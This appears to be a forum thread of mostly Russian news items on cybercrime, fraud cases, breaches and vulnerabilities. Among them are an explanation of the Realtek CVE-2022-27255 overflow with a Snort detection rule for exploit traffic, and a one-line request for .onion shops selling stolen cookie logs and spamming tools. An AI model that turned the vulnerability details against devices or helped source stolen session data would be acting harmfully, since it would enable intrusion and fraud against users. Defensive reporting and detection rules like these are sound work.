Разработкой квантовых компьютеров сегодня занимаются крупнейшие игроки IT- индустрии. Уже сейчас есть действующие прототипы, выполняющие специфические алгоритмы быстрее суперкомпьютеров традиционной архитектуры. Аналитики Gartner ожидают появления универсальных и коммерчески доступных квантовых компьютеров к 2030 году. Это несёт риски для информационной безопасности, поскольку с достаточно мощным квантовым компьютером появится возможность взлома многих криптографических алгоритмов. Все онлайн-сервисы — от интернет-магазинов до крупных государственных порталов, а также системы удалённого управления — могут стать уязвимыми. Работая на упреждение, компании «Криптонит» и «QApp» последовательно занимаются разработкой и стандартизацией постквантовых криптографических механизмов, которые останутся актуальными даже после появления квантовых компьютеров.
Прямая ссылка на открытую реализацию алгоритма «Шиповник» на GitHub: https://github.com/QAPP-tech/shipovnik_tc26
В Екатеринбурге мошенники придумали новую схему для обмана людей. Они развешивают по подъездам объявление о якобы бесплатной установке домофона. Чтобы оставить заявку, нужно пройти по QR-коду, ведущему на фишинговый сайт, через который у людей воруют деньги.
У молодых и наивных ребят обманом выманивают тысячи долларов...
Эксперты предупреждают о новой волне мошенничества, нацеленного на выпускников
колледжей в Северной Америке. Киберпреступники рассылают вчерашним студентам
поддельные предложения о работе в сфере бионаук и медицины, чтобы затем
выманить деньги у доверчивых и ещё совсем «зелёных» специалистов.
Как выяснили в компании Proofpoint, занимающейся кибербезопасностью, последняя такая массовая фишинговая рассылка проводилась в мае-июне — как раз в сезон выпускных. Письма приходили якобы от имени биотехнологических и медицинских организаций и содержали приглашения на собеседование для удалённой работы с данными.
Хотя подробности предполагаемых собеседований неизвестны, эта схема является разновидностью так называемого «мошенничества с авансовыми платежами». Злоумышленники предлагают жертве заплатить аванс, который якобы пойдёт на технические оснащение их рабочего места, а затем исчезают вместе с деньгами.
В Proofpoint отмечают, что похожие объявления о работе в биотехе появлялись ещё с марта. Однако мошенничество под видом трудоустройства — известный и популярный способ обмана уже много лет.
«Эти аферисты играют на чувствах людей, которые ищут работу. Они предлагают должность, но при этом просят оплатить нужное для неё оборудование и софт. А потом просто крадут эти деньги», — предупреждают специалисты Proofpoint.
Особенно опасно, что атака пришлась как раз на время массовых увольнений в крупных IT-компаниях, что затронуло тысячи различных специалистов, которые теперь отчаянно ищут работу.
Студенты — лакомая мишень для мошенников. Ведь они сильно заинтересованы в трудоустройстве и наиболее склонны верить предложениям о дистанционной занятости из сомнительных писем. Даже те, для кого английский — родной язык, могут не заметить признаков мошенничества.
Письма приходят с фиктивных почтовых адресов, имитирующих существующие организации с темами типа «По поводу собеседования». Имена отправителей также списаны с реальных специалистов, которых легко можно найти на LinkedIn. В некоторых подобных рассылках злоумышленники даже используют базовую информацию о жертве с целью максимально персонализировать своё письмо.
Во вложениях к подобным письмам — список требуемого программного обеспечения и железа, как правило, на несколько тысяч долларов. Жертву либо просят оплатить выставленный счёт до выхода на работу, пообещав компенсацию из первой зарплаты, либо сразу присылают фиктивный чек на эту же сумму, с которого жертва впоследствии не сможет снять никаких средств.
В Proofpoint предполагают, что злоумышленники могут также запросить криптовалюту якобы на доставку нужного оборудования. Хотя в текущей волне преобладала биомедицинская тематика, аналогичные схемы используют и в других сферах.
Эксперты напоминают, что настоящие работодатели никогда не требуют предоплаты или авансов. Пусть даже речь идёт о вполне реальной и престижной компании.
Такие атаки ведут как частные мошенники ради наживы, так и государственные киберпреступные группировки. В прошлом году сообщалось, что северокорейские хакеры массово рассылали письма о фиктивных вакансиях и повышениях зарплаты, чтобы заразить компьютеры жертв вредоносным ПО для кражи криптовалют.
Похожие жалобы поступали от студентов Гарвардского университета и прочих крупных организаций. ФБР также неоднократно предупреждало о мошеннических объявлениях о работе, используемых для развода соискателей в Юго-Восточной Азии.
29 из 30 протестированных сайтов отправляли незащищенные пароли обратно в Microsoft и Google.
Проблема была обнаружена соучредителем и главным техническим директором компании otto-js Джошем Саммитом. Во время одного из тестирований Саммит и команда ott-js выяснили, что если пользователь включит определенный набор настроек в функции расширенной проверки правописания в Edge или Chrome, то при вводе каких-либо личных данных и паролей, они в незащищенном виде будут отправляться обратно на серверы Microsoft и Google.
Также известно, что пароли могут передаваться на серверы IT-гигантов даже если пользователь просто воспользуется функцией предпросмотра пароля, так как ее затрагивает расширенная проверка правописания.
В опасности данные не только обычные пользователи, но и крупные компании, ведь
данные сотрудников могут быть скомпрометированы неизвестными хакерами. Чтобы
доказать это, компания привела пример.

На первом изображении представлена страница входа в Alibaba Cloud. При входе в
систему через Chrome, функция расширенной проверки орфографии без разрешения
передает информацию о запросе на серверы Google. Как видно на скриншоте ниже,
эта информация включает в себя пароль, который вводит сотрудник компании.

Доступ к такой информации может привести к чему угодно: от кражи данных
организации и клиентов до полной компрометации критической инфраструктуры.
Команда otto-js провела тестирование и анализ, в результате которого выяснилось, что 29 из 30 контрольных групп (социальные сети, офисные инструменты, правительственные сайты, а также сайты, предоставляющие финансовые услуги) отправляют данные на серверы Google и Microsoft. 73% протестированных сайтов отправляют пароли на сторонние серверы, если пользователь пользуется функцией предпросмотра пароля.
Компания уже связалась с Microsoft 365, Alibaba Cloud, Google Cloud, AWS, LastPass и предупредила их о возможных рисках для корпоративных клиентов. Согласно ответам AWS и LastPass, им уже удалось успешно устранить проблему.
](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969)
 msrc.microsoft.com

(CVE-2022-37969) - Help Net Security ](https://www.helpnetsecurity.com/2022/09/13/cve-2022-37969/)
Microsoft had delivered fixes for 64 vulnerabilities in various products, including an actively exploited zero-day (CVE-2022-37969).
 www.helpnetsecurity.com
Служба расследований национальной безопасности США (HSI) задержала троих жителей Майами по подозрению в мошенничестве с криптовалютами и краже чужих личных данных.
Министерство юстиции США обвинило Эстебана Кабреру да Корте (Esteban Cabrera da Corte), Луиса Эрнандеса Гонсалеса (Luis Hernandez Gonzalez) и Асдрубала Рамиреса Мезу (Аsdrubal Ramirez Meza) в мошенничестве с криптовалютами. Используя украденное удостоверение личности, мужчины купили цифровые активы на торговой платформе, а затем заявили, что транзакции не были санкционированы, чтобы получить возмещение.
«Преступная группировка из Майами использовала украденные личные данные для покупки криптовалюты, а затем потребовала возмещения, оспорив транзакции, и заставив банки США поверить в то, что они сами стали жертвами мошенничества. Благодаря усилиям оперативной группы HSI их афера была раскрыта, и теперь им предъявлены серьезные федеральные обвинения», – сообщил прокурор США Дэмиан Уильямс (Damian Williams).
Click to expand...
Всего группа мошенников похитила $4 млн. Наибольшие убытки понесла криптовалютная биржа, которая потеряла $3.5 млн. За преступление обвиняемым грозит до 30 лет тюрьмы. HSI пообещала совместно с Секретной службой США и партнерами в Южном округе Нью-Йорка продолжить отслеживать следы незаконных транзакции и предупреждать любые будущие формы криптомошеничества.
Исследователи из компании Faraday Security представили на конференции DEFCON детали эксплуатации критической [уязвимости](https://www.realtek.com/images/safe- report/Realtek_APRouter_SDK_Advisory-CVE-2022-27255.pdf) (CVE-2022-27255) в SDK для чипов Realtek RTL819x, позволяющей выполнить свой код на устройстве через отправку специально оформленного UDP-пакета. Уязвимость примечательна тем, что позволяет атаковать устройства, в которых отключён доступ в web-интерфейс для внешних сетей - для атаки достаточно просто отправить один UDP-пакет.
Уязвимость затрагивает устройства, в которых используются уязвимые версии SDK Realtek, включая eCos RSDK 1.5.7p1 и MSDK 4.9.4p1. Обновления eCos SDK с устранением уязвимости были опубликованы Realtek 25 марта. Пока не ясно какие именно устройства подвержены проблеме - SoC Realtek RTL819x используется в сетевых маршрутизаторах, точках доступа, усилителях Wi-Fi, IP-камерах, устройствах интернета вещей и прочих сетевых устройствах более 60 производителей, включая Asus, A-Link, Beeline, Belkin, Buffalo, D-Link, Edison, Huawei, LG, Logitec, MT-Link, Netgear, Smartlink, UPVEL, ZTE и Zyxel.
В открытом доступе уже опубликованы примеры эксплоитов для получения удалённого доступа к устройству и выполнения своих команд на примере атаки на маршрутизатор Nexxt Nebula 300 Plus. Дополнительно опубликованы утилиты для анализа прошивок на наличие уязвимости.
С учётом проблем с подготовкой и доставкой и обновлений прошивок на уже выпущенные устройства предполагается появление в скором времени автоматизированных атак и червей, поражающих уязвимые сетевые устройства. После успешной атаки поражённые устройства могут использоваться злоумышленниками, например, для формирования ботнетов, внедрения бэкдоров для оставления лазейки во внутреннюю сеть предприятия, перехвата транзитного трафика или его перенаправления на внешний хост.
Уязвимость вызвана переполнением буфера в модуле "SIP ALG" (SIP Application Layer Gateway), применяемом для организации проброса SIP-пакетов за транслятор адресов. Проблема возникла из-за отсутствия проверки фактического размера полученных данных, что приводит к перезаписи области памяти за пределами фиксированного буфера при вызове функции strcpy во время обработки пакетов SIP. Атака может быть совершена через отправку UDP-пакета с некорректными значениями полей в блоке данных SDP или заголовке протокола SIP. Для эксплуатации достаточно отправить один пакет на произвольный UDP-порт WAN- интерфейса.
В качестве обходного пути защиты рекомендовано блокировать на межсетевом экране или в системе предотвращения сетевых вторжений UDP-пакеты с SIP- сообщением "INVITE", строкой "m=audio" и размером больше 128 байт. Пример правила для выявления попыток эксплуатации в IDS Snort 3:
Code:Copy to clipboard
alert udp any any -> any any (sid:1000000; \
msg:"Realtek eCOS SDK SIP Traffic Exploit CVE-2022-27255"; \
content: "invite"; depth: 6; nocase; \
content: "m=audio "; \
isdataat: 128,relative; content:!"|0d|"; within: 128;)
• Video: https://github.com/infobyte/cve-2022-27255/raw/main/DEFCON/poc.mp4
Специалисты компаний [SEKOIA](https://blog.sekoia.io/luckymouse-uses-a- backdoored-electron-app-to-target-macos/) и [Trend Micro](https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises- chat-app-Mimi-targets-windows-mac-linux-users.html) опубликовали отчеты, посвященные активности китайской хак-группы APT27 (она же Emissary Panda, Iron Tiger и LuckyMouse). Оказалось, что злоумышленники создали кроссплатформенную вредоносную версию китайского мессенджера MiMi (秘密, «секрет» на китайском языке), и с его помощью атакуют пользователей Windows, Linux и macOS.
Так, исследователи из SEKOIA пишут, что MiMi для macOS версии 2.3.0 был взломан почти четыре месяца назад, 26 мая 2022 года. Компрометация обнаружилась во время анализа инфраструктуры трояна удаленного доступа HyperBro, связанного с APT27: малварь связывалась с приложением, что показалось экспертам подозрительным.
Аналитики TrendMicro тоже заметили эту кампанию (независимо от своих коллег) и теперь сообщают, что выявили старые троянизированные версии MiMi, нацеленные на Linux (бэкдор rshell) и Windows (RAT HyperBro).
При этом самый старый образец rshell для Linux датирован июнем 2021 года, и о первой жертве этой кампании стало известно еще в середине июля 2021 года. В общей сложности атакам подверглись не менее 13 различных организаций на Тайване и Филиппинах, и 8 из которых пострадали от rshell.
Эксперты рассказывают, что в случае MacOS, вредоносный код JavaScript, внедренный в MiMi, проверяет, работает ли приложение на Mac, а затем загружает и запускает бэкдор rshell. После запуска малварь собирает и отправляет своим операторам системную информацию и ожидает дальнейших команд.
Хакеры могут использовать вредоноса для составления списков файлов и папок, а также для чтения, записи и загрузки файлов в скомпрометированных системах. Кроме того, бэкдор способен воровать данные и отправлять конкретные файлы на свой управляющий сервер.
По словам экспертов, связь этой кампании с APT27 очевидна. Так, инфраструктура злоумышленников использует уже известный ИБ-специалистам диапазон IP-адресов. Кроме того, подобные кампании уже наблюдались ранее, к примеру, бэкдор внедряли в мессенджер Able Desktop (операция [StealthyTrident](https://www.welivesecurity.com/2020/12/10/luckymouse- ta428-compromise-able-desktop/)), а упаковка вредоносного кода осуществлялись с помощью уже известного [инструмента](https://securelist.com/luckymouse-hits- national-data-center/86083/), связанного с APT27.
Стоит отдельно отметить, что нельзя с уверенностью утверждать, что речь идет именно об атаке на цепочку поставок. Дело в том, что по данным Trend Micro, хакеры явно контролируют серверы, на которых размещены установщики MiMi, и эксперты предполагают, что имеют дело с компрометацией легитимного и не слишком популярного мессенджера, ориентированного на китайскую аудиторию.
В свою очередь аналитики SEKOIA говорят, что MiMi выглядит весьма подозрительно: связанный с мессенджером сайт (www.mmimchat[.]com) не содержит подробного описания приложения, условий использования и ссылок на социальные сети. Проверить легитимность компании-разработчика Xiamen Baiquan Information Technology Co. Ltd. тоже не удалось. В итоге эксперты SEKOIA пишут, что мессенджер вообще могли разработать сами хакеры, и он представляет собой изначально вредоносный инструмент для слежки за конкретными целями.
«На данном этапе SEKOIA не может оценить цели этой кампании. Поскольку использование этого приложения в Китае выглядит минимальным, вполне вероятно, что оно было разработано как инструмент для целевой слежки. Также вероятно, что после этапа социальной инженерии, которую осуществляли операторы [малвари], целевым пользователям предлагали загрузить это приложение, якобы для обхода цензуры китайских властей», — заключают исследователи.
Click to expand...
Министерство юстиции США сообщило, что житель Техаса купил 38 000 краденых аккаунтов PayPal и использовал их для кражи денежных средств у владельцев счетов. В среду, 11 мая 2022 года, мошенника приговорили к пяти годам тюремного заключения.
В заявлении министерства сообщается, что 37-летний Маркос Понсе (Marcos Ponce) из техасского города Остин признал себя виновным в сговоре с целью совершения мошенничества с помощью электронных платежных систем. В судебном деле отмечается, что Понсе и его сообщники вели свою деятельность с ноября 2015 года по ноябрь 2018 года.
За это время мошенники приобрели более 38 000 аккаунтов PayPal. Все данные для входа в профили покупались на специализированном теневом форуме. Там хакеры публиковали на торговой площадке логины, пароли и всю информацию, полученную о владельце.
После приобретения данных для входа мошенники искали третье лицо, которое убеждали в том, что ему необходимо принять средства с краденого аккаунта и перевести их на другой счет. Такой шаг в мошеннической схеме позволял усложнять путь перемещения денег. В министерстве рассказали, что для этого Понсе и сообщники разработали собственный алгоритм социального инженеринга для этой ситуации и третьи лица даже не подозревали, что принимают участие в преступлении.
• Source: https://www.justice[.]gov/opa/pr/man-sentenced-stealing-paypal- accounts-wire-fraud-scheme
Корейская биржа Bithumb объявила, что уже через два дня запретит вывод криптовалют на кошельки без системы обязательной верификации пользователя, например, MetaMask и MyEtherWallet.
Как отмечается в [заявлении](https://cafe.bithumb.com/view/board- contents/1642612), Bithumb станет второй крупной биржей в Южной Корее, которая запретит вывод на криптовалютные кошельки без верификации пользователя. Месяц назад такую политику ввела площадка Coinone. При этом пользователям останутся доступны выводы на адреса на других криптовалютных биржах, известных своими требованиями по верификации пользователей. В список попали площадки Kraken, Bitstamp, Blockchain.com, Binance.US и Bybit.
По данным местного издания Money Today, на ужесточение политики биржи Bithumb повлиял партнерский банк Nonghyup Bank. Запрет вывода криптовалют на непроверенные кошельки соответствует требованиям FATF, поэтому банк «крайне рекомендовал запретить все личные кошельки без идентификации пользователя». Например, под запрет попадают MetaMask и MyEtherWallet.
Отметим, что любая корейская криптовалютная биржа, предлагающая торговлю в паре с корейской воной, должна заключить партнерское соглашение с банком. При этом каждому клиенту будет открыт персональный счет. Соответственно, такие партнерские банки имеют достаточно сильное влияние на политики KYC и AML на криптовалютных биржах.
Крупные корейские биржи Upbit и Korbit пока не ввели запрет на вывод криптовалют на непроверенные кошельки. Однако, скорее всего, такие запреты будут введены до 25 марта 2022 года – этот срок является крайним для соответствия требованиям FATF. При этом именно Upbit наиболее популярная биржа в Южной Корее – на этой площадке совершается 76% сделок по объему.
Также Bithumb работает над запуском платформы для торговли и выпуска коллекционных токенов (NFT). Платформа должна быть представлена пользователям уже в этом году.
Соучредитель компании, которой Google и Twitter доверяют отправку кодов безопасности миллионам пользователей, вел секретный бизнес и помогал правительствам тайно отслеживать мобильные телефоны пользователей.
Mitto выступает в качестве стороннего поставщика услуг SMS для некоторых из крупнейших компаний технологической отрасли. Компания предлагает рекламные услуги, а также обеспечивает безопасную авторизацию в системы и двухфакторную аутентификацию для различных платформ с помощью текстовых сообщений с кодом безопасности. Mitto сотрудничает с десятками телекоммуникационных компаний и заключила контракты с Twitter, Google, WhatsApp, Telegram, TikTok, Instagram, LinkedIn и Slack.
По результатам расследования специалистов издания Bloomberg и некоммерческой организации Bureau of Investigative Journalism, Горелик продавал доступ к сетям компании частным предприятиям и спецслужбам для шпионажа за различными пользователями. Четыре бывших сотрудника Mitto и подрядчики ИБ-фирм, работавшие с Гореликом, подтвердили «побочный» бизенес руководителя. По словам бывших сотрудников Mitto, о слежке не знали ни клиенты компании, ни операторы мобильной связи. О существовании секретного сервиса было известно лишь небольшому количеству сотрудников компании. Горелик продавал доступ к сетям компаниям, предоставляющим услуги видеонаблюдения, которые, в свою очередь, заключили контракты с госорганами.
Доступ к глобальным телефонным сетям был обеспечен через уязвимости в телекоммуникационном протоколе SS7. Эксплуатация уязвимости в SS7 может позволить злоумышленнику отслеживать физическое местоположение определенных телефонов, а также перенаправлять текстовые сообщения и телефонные звонки.
Бывшие сотрудники по крайней мере одной компании (кипрской ИБ-фирмы TRG Research and Development) признали получение доступа к сетям Mitto через Горелика. Горелик лично установил программное обеспечение TRG для видеонаблюдения в сети Mitto, позволяя скрытно получить доступ к сети.
По словам информаторов, Горелик впервые начал продавать доступ к сетям Mitto в 2017 году.
• Source: [https://www.thebureauinvestigates.c...d-of-selling-mobile-network- access-for- spying](https://www.thebureauinvestigates.com/stories/2021-12-06/swiss-tech- company-boss-accused-of-selling-mobile-network-access-for-spying)
Japanese consumer electronics giant Panasonic has disclosed a security breach wherein an unauthorized third-party broke into its network and potentially accessed data from one of its file servers.
"As the result of an internal investigation, it was determined that some data on a file server had been accessed during the intrusion," the company said in a short statement published on November 26. Panasonic didn't reveal the exact nature of the data that was accessed, but TechCrunch reported that the breach began on June 22 and ended on November 3.
The Osaka-based company said that immediately upon discovering the intrusion on November 11, it took steps to report the incident to the relevant authorities and that it implemented security countermeasures, including preventing external access to the network.
Panasonic also noted it's currently working with an independent "specialist" organization to probe the extent of the leak and determine if the access resulted in the exposure of customers' personal information.

](https://thehackernews.com/2021/11/panasonic-suffers-data-breach-after.html)
Panasonic suffers a data breach following a hack of its network and file servers.
 thehackernews.com
Безработный житель Волынской области с высшим образованием, ранее не судимый, попался на торговле конфиденциальными персональными данными граждан Украины. Как сообщается в материалах суда, эти файлы он хранил на собственном компьютере, с неустановленного следствием, времени.
Фотокопии документов содержали полную информацию об именах, датах и месте рождения, семейном положении, регистрации граждан и т.п.. Способ происхождения этих данных не уточняется, однако понятно, что они были добыты из интернета.
Подобные файлы пользуются стабильным спросом у киберпреступников. Например, с их помощью, можно оформлять онлайн-кредиты на ничего не подозревающих граждан. Поэтому, зная, что найти покупателей не составит большого труда, мужчина решил заработать на продаже этих данных.
С целью продажи этих данных, обвиняемый зарегистрировался под псевдонимом в мессенджере Telegram, а также на паре хакерских форумов, где разместил объявления о продаже фотокопий паспортов граждан Украины.
В ходе завязавшейся переписки с четырьмя пользователями Telegram, он договорился о продаже им графических файлов с конфиденциальными персональными данными украинских граждан, которые хранил на своем компьютере.
Судя по валюте сделки, покупателями оказались резиденты Российской Федерации: общая выручка продавца данных составила 12,6 тысяч рублей, что в украинской гривне эквивалентно 4,6 тыс., на момент совершения сделки.
Стоит отметить, что хранение, сбор и распространение подобных конфиденциальных данных, позволяющих точно идентифицировать личность, без соответствующего разрешения, запрещены ст. 32 Конституции Украины и ст. 11 Закона «Про информацию», а совершенное обвиняемым уголовное преступление, классифицируется, как «несанкционированный сбыт информации с ограниченным доступом, совершенный повторно» (ч.2. ст. 361 УК). Учитывая, кому обвиняемый продал данные, можно было бы дополнительно повесить на него измену родине.
Однако, так далеко правоохранители заходить не стали. В рамках возбужденного уголовного дела, между прокурором и обвиняемым было заключено соглашение о добровольном признании вины. По условиям соглашения, в качестве окончательного наказания обвиняемому должен быть присужден штраф, в размере 2,100 необлагаемых налогом минимумов дохода (35,7 тысяч гривен).
Рассмотрев обстоятельства дела, суд охарактеризовал факт продажи фотокопий паспортов, как нетяжкое преступление и утвердил соглашение с прокурором, вернув владельцу арестованный компьютер и мобильный телефон. Были ли удалены данные, которые хранились в памяти арестованного ноутбука – в материалах суда не уточняется.
Следственной частью Следственного управления УМВД России по Липецкой области возбуждено уголовное дело по ч. 2 ст. 187 Уголовного кодекса Российской Федерации в отношении двух местных жителей.
В ходе предварительного расследования установлено, что в мае 2023 года липчанин в возрасте 22 лет создал организованную группу для неправомерного приёма и перевода денежных средств. Для реализации преступного умысла подозреваемый привлёк своего 21-летнего знакомого. Вместе они занимались поиском лиц, которые за вознаграждение оформляли на своё имя банковские карты для последующей их передачи третьим лицам.
На счету сообщников 6 эпизодов противоправной деятельности, связанной с неправомерным оборотом средств платежей. Предварительно установлено, что общая сумма незаконных финансовых операций составила более 6 млн рублей.
В отношении 22-летнего фигуранта судом избрана мера пресечения в виде заключения под стражу. Его подельник находится под подпиской о невыезде и надлежащем поведении.
Кроме того, сотрудниками полиции установлены 5 граждан, которые за деньги передавали участникам преступной группы банковские карты, оформленные на своё имя. Их действия квалифицированы следствием по ч. 1 ст. 187 Уголовного кодекса Российской Федерации. Всем им избрана мера пресечения в виде подписки о невыезде.
Организовано проведение следственных действий и оперативно-розыскных мероприятий, направленных на установление всех участников и эпизодов преступной деятельности.
Глава казахстанского Центра анализа и расследования кибератак (ЦАРКА) в мажилисе рассказал, как сам попался на уловку мошенников в интернете, передает корреспондент NUR.KZ.
Эксперт Олжас Сатиев в ходе выступления озвучил несколько инициатив, одна из них - это создание системы "цифровые улики".
"Какая проблема здесь возникает? Даже я, один из известных специалистов по кибербезопасности, попался на уловку мошенников - у меня там 20 тысяч деньги украли.
И сама проблема, что у нас многие граждане не идут писать заявление в МВД, когда у них не так много денег воруют - здесь вопрос в том, чтобы, возможно, в электронном правительстве, в приложениях банковского сектора, в МВД создать какой-то раздел киберзащиты гражданина.
Например, гражданина обманули - он перевел деньги на какую-то карточку, по такому-то номеру телефона, с такого-то инстаграм-аккаунта. И он не идет никуда, не пишет заявление, а в системе ситуационного центра того же МВД сразу это появилось, что с такого-то номера воруют деньги.
Здесь же можно создать, чтобы они видели статистику - что с этого инстаграм- аккаунта обманули уже не одного человека. И это ускорит процесс блокировки карточек (задействованных в мошенничестве – прим.авт.)", - заявил глава ЦАРКА Олжас Сатиев.
Еще одной предложенной им инициативой стало создание в Казахстане отдельного агентства по кибербезопасности.
sc: nur.kz/technologies/internet/2064427-glavu-tsentra-rassledovaniya- kiberatak-obmanuli-na-20-tysyach-tenge-v-internete/
При процессуальном руководстве прокуроров Волынской областной прокуратуры разоблачена группа лиц в Луцке, которые организовали мошеннический колл-центр (ч. 4, 5 ст. 190 УК Украины).
По данным следствия, участники организованной группы звонили гражданам разных стран, и назывались работниками инвестиционной компании. Путем обмана и злоупотребления доверием они склоняли собеседников к перечислению денежных средств под предлогом инвестирования в криптовалюты, ценные бумаги и другие активы.
По оперативной информации, размер нанесенного потерпевшим от мошенничества ущерба составил около 2 млн гривен ежемесячно.
Во время обыска в офисном помещении в Луцке изъято 25 компьютеров и 5 телефонов, которые содержат переписку с обманутыми иностранцами.
Кроме того, правоохранители обнаружили также черновые записи, среди которых - сценарии разговоров с будущими пострадавшими, которые обманщики применяли, чтобы завладеть чужими деньгами.
Во время обыска в доме двух руководителей колл-центра изъято четыре компьютера, банковские карты и договоры.
Решается вопрос о наложении ареста на изъятое имущество.
Досудебное расследование осуществляет ТУ ГБР в городе Львове при оперативном сопровождении УСБУ в Волынской области, УСР ДВР Национальной полиции Украины и ГУНП в области.
does anyone have .onion sites that sell cookie logs and spamming tools?
В атаке на спутниковую сеть компании обвиняют российских хакеров.
На встрече, проведенной 17 июля генеральным секретарем по обороне и национальной безопасности Франции Стефаном Буйоном, были подробно описаны масштабы кибератак. По данным Французского Национального агентства по безопасности информационных систем (ANSSI), в прошлом году было зафиксировано 1082 кибератаки, что на 37% больше, чем годом ранее.
Буйон напомнил об атаке на Viasat, которую российские хакеры совершили 24 февраля. Системы спутникового оператора использовались украинскими военными для связи по всей Западной Европе. А во Франции эта кибератака вывела из строя службы скорой и пожарной помощи.
В мае разведка США, Великобритании и ЕС подтвердила, что за атакой на спутниковую сеть KA-SAT компании VIASAT стоят российские киберпреступники. Согласно их заявлениям, российские хакеры также ответственны за кибератаки на европейские ветряные электростанции.
Дмитрий Чечулин спалился по паспорту В Италии задержали и отпустили под залог сооснователя криптопирамиды FrendeX, похитившей более 250 млн руб. у вкладчиков
Дмитрий Чечулин
В Италии отпущен под залог сооснователь татарстанской криптопирамиды FrendeX Дмитрий Чечулин. Как стало известно «БИЗНЕС Online», в руках Интерпола он оказался еще 3 июля, когда россиянина задержала полиция в небольшом городке в области Эмилия-Романья. Генпрокуратура готовит экстрадицию Чечулина, но в последнее время Европа не выдает России даже убийц. В любом случае история с основателем FrendeX станет прецедентом для многих других беглых последователей Сергея Мавроди и Кирилла Доронина. Подробности — в материале «БИЗНЕС Online».
Как на Чечулина вышел Интерпол
В сетях Интерпола оказался первый из сбежавших основателей пирамид, успевших покинуть Татарстан и Россию. Как стало известно «БИЗНЕС Online», в Италии задержан сооснователь FrendeX Дмитрий Чечулин. Он покинул страну за два дня до краха пирамиды — 7 августа 2021 года. Тяга к путешествиям и шикарному отдыху его и сгубила. По информации источника, близкого к расследованию уголовного дела, Чечулин был задержан 3 июля в небольшом городке в 380 км от Рима, в области Эмилия-Романья, возможно, главном гастрономическом регионе Италии. Например, это родина пармезана, прошутто и бальзамического уксуса. На следующий день после задержания состоялся суд, по итогам которого Чечулина отпустили под залог, сумма которого не раскрывается.
На данный момент неизвестно, как объявленный в международный розыск сооснователь пирамиды смог пересечь границу с Европой. Ранее собеседники газеты сообщали, что через ОАЭ Чечулин уехал в Бразилию, но, возможно, расслабился из-за политической обстановки в мире. Источник «БИЗНЕС Online» газеты утверждает, что Интерпол вышел на Чечулина благодаря двум деталям: беглец арендовал на свое имя автомобиль и забронировал на собственный паспорт номер в одной из гостиниц.
Пока фигурант уголовного дела продолжает оставаться на свободе, Генпрокуратура РФ готовит документы для экстрадиции. Процесс подготовки документов и передачи обвиняемого может занять до нескольких месяцев. И даже здесь успех не гарантируется силовикам: у России нет соглашения об экстрадиции с Италией. Но соответствующий вопрос в том числе регулирует меморандум «Об основных направлениях сотрудничества между министерством юстиции Российской Федерации и министерством юстиции Итальянской Республики», который был подписан в 2004 году. Согласно нему, решение об экстрадиции фигурантов уголовных дел принимается в индивидуальном порядке по усмотрению властей.
И здесь начинаются сложности. Одновременно с началом СВО на Украине взаимодействие России с большинством стран Европы по вопросам экстрадиции обвиняемых и даже осужденных россиян сошло на нет, пишет сегодня «Коммерсантъ». По сообщению издания, с конца февраля наша Генпрокуратура получила 43 отказа в экстрадициях от европейских коллег. При этом если раньше надежным убежищем для фигурантов преступлений считалась одна Великобритания, то теперь таковых государств стало заметно больше десятка. Причем там считают, что выдаче не подлежат даже осужденные за убийства и те, кто вовлекал в проституцию несовершеннолетних.
В России же Чечулин давно заочно арестован. Так что если его все же экстрадируют из Италии, то сразу поместят в СИЗО. Под арестом и его многочисленное имущество: квартира в родном Челябинске, пять мотоциклов Yamaxa, Harley-Davidson, Indian Challenger, цены которых начинаются от 700 тыс. рублей. Также он владеет отечественной «Волгой» и пикапом Dodge Ram 1500, цена которого — от 9 млн рублей. Чечулину грозит до 10 лет лишения свободы.
Что такое FrendeX и как крушение пирамиды расследуют силовики Татарстана
Напомним, проект FrendeX открылся еще в 2017 году, изначально это был «закрытый инвестиционный клуб». Таким он являлся до 2020-го. Руководство в лице основателя Руслана Пичугина изменило формат проекта после начала пандемии. Сыграли на тех, кто за время локдауна лишился работы и потерял стабильный заработок.
Руслан Пичугин
Напомним, проект FrendeX открылся еще в 2017 году, изначально это был
«закрытый инвестиционный клуб». Таким он являлся до 2020-го. Руководство в
лице основателя Руслана Пичугина изменило формат проекта после начала
пандемии. Сыграли на тех, кто за время локдауна лишился работы и потерял
стабильный заработок.
Способ заработка в платформе FrendeX не отличался от пирамид Finiko и Antares, которые, как утверждали создатели, зарабатывали деньги на трейдинге. Сначала это была якобы биржевая торговля на фондовых и валютных рынках, а затем компания начала «активную деятельность» в сфере недвижимости. Далее появилась криптовалюта и инвестиции в стартапы. Своим партнерам фирма предлагала до 2% дохода в день, а за неделю FrendeX обещал прибыль в 30–70%.
9 августа 2021 года основатели пирамиды Пичугин сообщил о ее закрытии в России с формулировкой: дескать, главный трейдер компании Чечулин сломал руки и торговать больше не может. «По регуляторным соображениям мы больше не можем продолжать работу в вашей стране», — также добавил он. Вкладчикам обещали вернуть деньги до октября 2021-го, даже предлагали заполнить специальные формы с указанием своих биткоин-кошельков. В результате люди не получили своих денег ни в октябре, ни через полгода.
Уголовное дело в отношении Пичугина возбудили лишь 18 октября 2021 года. Его обвиняли в мошенничестве в особо крупном размере (ч. 4. ст. 159). Сумма ущерба, по версии МВД по РТ, — 200 млн рублей. Его главный партнер и сооснователь пирамиды Чечулин начал фигурировать в деле как обвиняемый спустя четыре месяца — 14 февраля 2022 года. В этот же день он был объявлен в розыск. Официальная формулировка следствия такова: Пичугин и Чечулин, «действуя с неустановленными лицами, имея умысел на хищение имущества, путем распространения ложной информации о высоких доходах на платформе FrendeX с мая 2020 по август 2021 года похитили средства вкладчиков в особо крупном размере».
Правда, фигуранты дела к этому времени уже несколько месяцев были за границей, а о предварительном следствии стало известно только в марте, когда адвокат подсудимого подавала жалобы в суд на все что только возможно. Важно отметить, что интересы обоих обвиняемых до сегодняшнего дня представляет один защитник — московский адвокат Наталья Зотова. Связь с клиентами она ведет дистанционно.
Если экстрадиция Чечулина в Россию все же произойдет, это станет первой победой силовиков, которые расследуют массовые дела о новых финансовых пирамидах. Например, в Турции прямо сейчас находится объявленный в розыск Эрик Гафаров, основавший пирамиду имени себя. А еще скрываются Зыгмунт Зыгмунтовичь, Марат и Эдвард Сабировы, которых МВД РФ считает сооснователями пирамиды Finiko.
